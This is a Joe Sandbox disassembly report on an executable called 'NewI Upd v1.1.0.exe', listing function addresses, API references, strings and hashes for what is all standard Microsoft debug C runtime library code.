String ID: %ls$C:\Users\user\Desktop\NewI Upd v1.1.0.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
API String ID: 0-269975004
Opcode ID: c61edd902e7e0398847b843957b7e803bfd5c567f4810b17b5655e16c1ce10e2
Instruction ID: 63063792e75fbbda074fc4bdfc0931f0e06de0874f20c46b4e39e554491156d2
Opcode Fuzzy Hash: c61edd902e7e0398847b843957b7e803bfd5c567f4810b17b5655e16c1ce10e2
Instruction Fuzzy Hash: 6C812CB1D10218DBDB18FF94D896BEEB7B4FF54304F104529E502EB292EB749904CBA2

Function 00880AE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIMED ref: 00880AEA

Part of subcall function 0087EA00: __guard_icall_checks_enforced.LIBCMTD ref: 0087EA06

___vcrt_getptd.LIBVCRUNTIMED ref: 00880AF2
__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 00880B2A
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 00880B74
_Smanip.LIBCPMTD ref: 00880B8F
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 00880BDE

Strings

csm, xrefs: 00880BF4
csm, xrefs: 00880B00

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
String ID: csm$csm
API String ID: 2671830719-3733052814
Opcode ID: c7f196789b9711e7b574eb45eb70aa5e47d8b602455095f0624435cc4699f567
Instruction ID: d5d5432c134a7b083b9969d74417e91dff5d3cf83674d4d445dc79dd9e22854e
Opcode Fuzzy Hash: c7f196789b9711e7b574eb45eb70aa5e47d8b602455095f0624435cc4699f567
Instruction Fuzzy Hash: 9C515EB5A00109ABCF44EF98D885AAF77AAFF58344F048558F909CB241D730EE56CBD2

Function 00880860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 00880877
___vcrt_getptd.LIBVCRUNTIMED ref: 00880882

Strings

RCC, xrefs: 008808A6
MOC, xrefs: 0088089B

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
Instruction ID: 57e226e0284801246d3d9390eaa540eee58db2f51badf809211be974ac10176b
Opcode Fuzzy Hash: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
Instruction Fuzzy Hash: A951FA71900109EBDB44EE98CC91EEE77B9FF48304F148259F91AE7296DA30AD45CFA1

Function 00896230 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 0089628A
__invoke_watson_if_error.LIBCMTD ref: 008962CF
__invoke_watson_if_error.LIBCMTD ref: 00896320

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00896271
copy_and_add_argument_to_buffer, xrefs: 008962AC, 008962FD
traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 00896302
traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 008962B1
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 008962A7, 008962F8

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __invoke_watson_if_error$TimevecTimevec::_std::_
String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
API String ID: 3608294869-1477255430
Opcode ID: 0e0a9d81a5b160c48c1f1f35fca9504566791d4c775736101fb7d8d8118550e1
Instruction ID: b8ee29dec0b21474882277c6fd8b74d559ebd5200bfcb6afdf5348e5ab580ce7
Opcode Fuzzy Hash: 0e0a9d81a5b160c48c1f1f35fca9504566791d4c775736101fb7d8d8118550e1
Instruction Fuzzy Hash: 74311CB5D40209ABCB14FFA4CC53EEE7778FF10700F14465AB526A6282EB74A7148B91

Function 00882E40 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 120timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 00882E75
std::_Timevec::_Timevec.LIBCPMTD ref: 00882EFE

Strings

create_environment, xrefs: 00882F59
traits::tcscpy_s(variable.get(), required_count, source_it), xrefs: 00882F5E
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00882E59, 00882EE5
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00882F54

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$traits::tcscpy_s(variable.get(), required_count, source_it)
API String ID: 4219598475-2967542164
Opcode ID: 6abb051a83f1d49543320942b66c9964822b28b095f1502189a26f559d992f64
Instruction ID: 2b09332a279d64fdafc56e9112722940130ad733df7c75117c456eb39caa41aa
Opcode Fuzzy Hash: 6abb051a83f1d49543320942b66c9964822b28b095f1502189a26f559d992f64
Instruction Fuzzy Hash: 0C4130B1D00219ABCB18FB98C892EEEB7B4FF50304F504159E502F6292EF30AB54DB91

Function 00887EE0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

_swprintf.LIBCMTD ref: 00887FBC

Strings

%.2X , xrefs: 00887FA2
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00887FCF
print_block_data, xrefs: 00887FD4
Data: <%s> %s, xrefs: 00888024
, xrefs: 00887F77
(*_errno()), xrefs: 00887FD9

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: _swprintf
String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
API String ID: 589789837-578187083
Opcode ID: 8ef759ec280c9cd189d0111f6264ef3334288ffd38a8db11444eccefa67f4b60
Instruction ID: 6db6056c7b18ad71a2ad6d6ce0a993e18824910acadcfd0bdeb98cfddc5aa4b1
Opcode Fuzzy Hash: 8ef759ec280c9cd189d0111f6264ef3334288ffd38a8db11444eccefa67f4b60
Instruction Fuzzy Hash: AD419D70904248DBDF04EFE8C952BAEBBB5FF44704F608158E506AF386DA75AA04CB91

Function 0089ACC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(0089ABB9,00000000,00000800,?,?,0089ABB9,00000000), ref: 0089ACD1
GetLastError.KERNEL32(?,?,0089ABB9), ref: 0089ACE5
_wcsncmp.LIBCMTD ref: 0089ACFB
_wcsncmp.LIBCMTD ref: 0089AD12
LoadLibraryExW.KERNEL32(0089ABB9,00000000,00000000,?,?,?,?,0089ABB9), ref: 0089AD26

Strings

ext-ms-, xrefs: 0089AD09
api-ms-, xrefs: 0089ACF2

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 180994465-537541572
Opcode ID: dbe2c6b5a900dd08a8f10e04abad919db934327f5d9da005299eed53bab4dcc0
Instruction ID: 9412a10f5bdcceef03c24b70399a6eea04657bacc52a5cdbccdcef6876663a84
Opcode Fuzzy Hash: dbe2c6b5a900dd08a8f10e04abad919db934327f5d9da005299eed53bab4dcc0
Instruction Fuzzy Hash: 6501867564020CF7EF14ABA0DD0AF6A7B64FB04705F148450FE04DA682DA74EA00D7D1

Function 008A8220 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\lowio\write.cpp, xrefs: 008A8275, 008A82C5, 008A834E, 008A83AA
buffer_size % 2 == 0, xrefs: 008A833D, 008A83B4
%ls, xrefs: 008A8269, 008A8342
buffer != nullptr, xrefs: 008A8264, 008A82CF
_write_nolock, xrefs: 008A82CA, 008A83AF

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
API String ID: 0-1420694404
Opcode ID: 0fbae220d37d484271dcd1151245f9f4dc9d405f67e64bf8bdcd103fd9944fc9
Instruction ID: ba52743d6142dfb46cf8e6ddceda8a28cba3b6eb63a4dee4416a24a9cb8e8582
Opcode Fuzzy Hash: 0fbae220d37d484271dcd1151245f9f4dc9d405f67e64bf8bdcd103fd9944fc9
Instruction Fuzzy Hash: 0DF12870E00218DFEB14DF98D895BAEBBB1FF89300F148559E519AB392DB709940CFA1

Function 008A6010 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 375COMMON

Download Yara Rule

Strings

pwcs != nullptr, xrefs: 008A6065, 008A60B5
%ls, xrefs: 008A606A
minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp, xrefs: 008A6073, 008A60AB
_wcstombs_l_helper, xrefs: 008A60B0

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
API String ID: 0-287901994
Opcode ID: 6a17fd1d6d77bb5696c95b25264eaedf1d915ec4013de4173c9e869b630f13b3
Instruction ID: c48ea304ad44d9e90b317f9873ee88ce3d29fe71c09df5ce605d435eb46ac5df
Opcode Fuzzy Hash: 6a17fd1d6d77bb5696c95b25264eaedf1d915ec4013de4173c9e869b630f13b3
Instruction Fuzzy Hash: 31F14C71A00209DFEF14DF98C891BBEBBB1FF4A304F248518E521AB685E770AD51CB51

Function 008A58B0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 281COMMON

Download Yara Rule

Strings

_mbstowcs_l_helper, xrefs: 008A5972
%ls, xrefs: 008A592C
minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp, xrefs: 008A5935, 008A596D
s != nullptr, xrefs: 008A5927, 008A5977

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
API String ID: 0-454128329
Opcode ID: b33e221755c174cbad4642f360523865f7cdabfa81df48921ea130c8cdc55afc
Instruction ID: 195a43f411fb04275d0c8a3ba7cf416095b587205d434d028b85f68bc1e73662
Opcode Fuzzy Hash: b33e221755c174cbad4642f360523865f7cdabfa81df48921ea130c8cdc55afc
Instruction Fuzzy Hash: 12B15B70A00609DFEB04DFA8C881BBE77B1FF46324F248619E926EB791D7749981CB51

Function 0089E250 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 265COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp, xrefs: 0089E2BC, 0089E2F4, 0089E421, 0089E459, 0089E546, 0089E581
%ls, xrefs: 0089E2B3, 0089E418, 0089E53A
("Buffer too small", 0), xrefs: 0089E535, 0089E58B
_wctomb_internal, xrefs: 0089E2F9, 0089E45E, 0089E586
destination_count > 0, xrefs: 0089E413, 0089E463
destination_count <= INT_MAX, xrefs: 0089E2AE, 0089E2FE

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
API String ID: 0-3614322479
Opcode ID: fa727fc23086008139b903d74c12e0fb31c4e65a09b142e168e9f08daa265f2f
Instruction ID: e32284ff2dd565cc13ae43553909aa23f1f54a595b31dd0c8075ed5fe2058ace
Opcode Fuzzy Hash: fa727fc23086008139b903d74c12e0fb31c4e65a09b142e168e9f08daa265f2f
Instruction Fuzzy Hash: B6A14C70A40209EFDF24EF94D856BEE7BB1FB54704F188419F911AA3C1D7B49A80CB91

Function 00889BE0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 239timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 00889DEA

Strings

minkernel\crts\ucrt\src\appcrt\stdio\output.cpp, xrefs: 00889C37, 00889C7B, 00889CE2, 00889D26
format != nullptr, xrefs: 00889C26, 00889C85
%ls, xrefs: 00889C2B, 00889CD6
buffer_count == 0 || buffer != nullptr, xrefs: 00889CD1, 00889D30
common_vsprintf, xrefs: 00889C80, 00889D2B

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
API String ID: 4219598475-3439959449
Opcode ID: 0b3f33a0df1f83c18f3d2dd20dc8c0520ba24d15dcdf2f1b03e1fea0a500adfe
Instruction ID: f9d0caaa7bb711d8f656e2bc985e750c2b9b7e31d2dae584af097db1f2a3fb53
Opcode Fuzzy Hash: 0b3f33a0df1f83c18f3d2dd20dc8c0520ba24d15dcdf2f1b03e1fea0a500adfe
Instruction Fuzzy Hash: 3BB128B094021C8FDB24EF14CC85BAAB7B0FF55314F1442D8E659A7282DB75AE84CF5A

Function 0087E0C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMTD ref: 0087E10D
___except_validate_context_record.LIBVCRUNTIMED ref: 0087E119

Part of subcall function 0087EA00: __guard_icall_checks_enforced.LIBCMTD ref: 0087EA06

__IsNonwritableInCurrentImage.LIBCMTD ref: 0087E1D5
_ValidateLocalCookies.LIBCMTD ref: 0087E240
_ValidateLocalCookies.LIBCMTD ref: 0087E293

Strings

csm, xrefs: 0087E1BF

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
String ID: csm
API String ID: 3439031638-1018135373
Opcode ID: ea3c0e4879a45615b44f90cc3b184867127a075347c1359b8b8e81644a99ae99
Instruction ID: cdd823658458d28c1218813a98cbf955446c3c19e79835bac85597509159105a
Opcode Fuzzy Hash: ea3c0e4879a45615b44f90cc3b184867127a075347c1359b8b8e81644a99ae99
Instruction Fuzzy Hash: 2C510F74E00209DFCB04DF98D881AAEBBB5FF8D314F108198E519A7356D735EA41CBA5

Function 00885CB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 00885E2B

Strings

offset == 0 || offset < size, xrefs: 00885D6B, 00885DB3
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00885CF6, 00885D23, 00885D7C, 00885DA9
%ls, xrefs: 00885CEA, 00885D70
IS_2_POW_N(alignment), xrefs: 00885CE5, 00885D2D
_aligned_offset_malloc_dbg, xrefs: 00885D28, 00885DAE

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __wcstombs_l
String ID: %ls$IS_2_POW_N(alignment)$_aligned_offset_malloc_dbg$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$offset == 0 || offset < size
API String ID: 3007373345-1586087174
Opcode ID: ea5066b2e4c82edc3351d7c08af692a2ecff4772a1d55767b36e425d6ac2aace
Instruction ID: c0900e91023eb080ffb5ef982e7362425f8f5efeaef294d3aa264e1fdccc69f0
Opcode Fuzzy Hash: ea5066b2e4c82edc3351d7c08af692a2ecff4772a1d55767b36e425d6ac2aace
Instruction Fuzzy Hash: 9A514C70E4060DAFDF10EF94CC46BAEB7B1FB48304F248524E915AA381D7B9AA40CF55

Function 008AB170 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

(fh >= 0 && (unsigned)fh < (unsigned)_nhandle), xrefs: 008AB1DD, 008AB242
%ls, xrefs: 008AB1E2, 008AB298
minkernel\crts\ucrt\src\appcrt\lowio\close.cpp, xrefs: 008AB1EB, 008AB238, 008AB2A1, 008AB2EE
_close_internal, xrefs: 008AB23D, 008AB2F3
(_osfile(fh) & FOPEN), xrefs: 008AB293, 008AB2F8

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
API String ID: 0-4089689869
Opcode ID: 2a242c15477c938be2512c44ec0a7002f8c4e0026a34ab6e59fd6313858d500b
Instruction ID: ef1b85052717404004094f65334c9c71921a7bd6f85010c1c0ccec6163ef4d81
Opcode Fuzzy Hash: 2a242c15477c938be2512c44ec0a7002f8c4e0026a34ab6e59fd6313858d500b
Instruction Fuzzy Hash: D1512E70A4021CAFEB14EF98DC52BBE7770FB51714F208159F925AA7D2DBB49A40CB81

Function 008A6BD0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 102COMMON

Download Yara Rule

Strings

(fh >= 0 && (unsigned)fh < (unsigned)_nhandle), xrefs: 008A6C1E, 008A6C60
%ls, xrefs: 008A6C23, 008A6CB6
(_osfile(fh) & FOPEN), xrefs: 008A6CB1, 008A6CF3
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp, xrefs: 008A6C2C, 008A6C56, 008A6CBF, 008A6CE9
_commit, xrefs: 008A6C5B, 008A6CEE

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
API String ID: 0-1026578051
Opcode ID: 2939147a7a77e92612ca7df81c911c72838e2ca130941859b7cae70f7841a652
Instruction ID: cb9bf49442844487f83835e3e2e0236904cb52c628683e8d58b5aadc9c66e8ae
Opcode Fuzzy Hash: 2939147a7a77e92612ca7df81c911c72838e2ca130941859b7cae70f7841a652
Instruction Fuzzy Hash: E631C970A4030CEEEB24DB54CC46BAD7B70FB01724F184144F525EA7C6E7B99A90DB95

Function 0089DB20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0089DBA8
__aligned_msize.LIBCMTD ref: 0089DC01
__invoke_watson_if_error.LIBCMTD ref: 0089DC1D

Strings

fp_format_nan_or_infinity, xrefs: 0089DC12
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0089DC0D
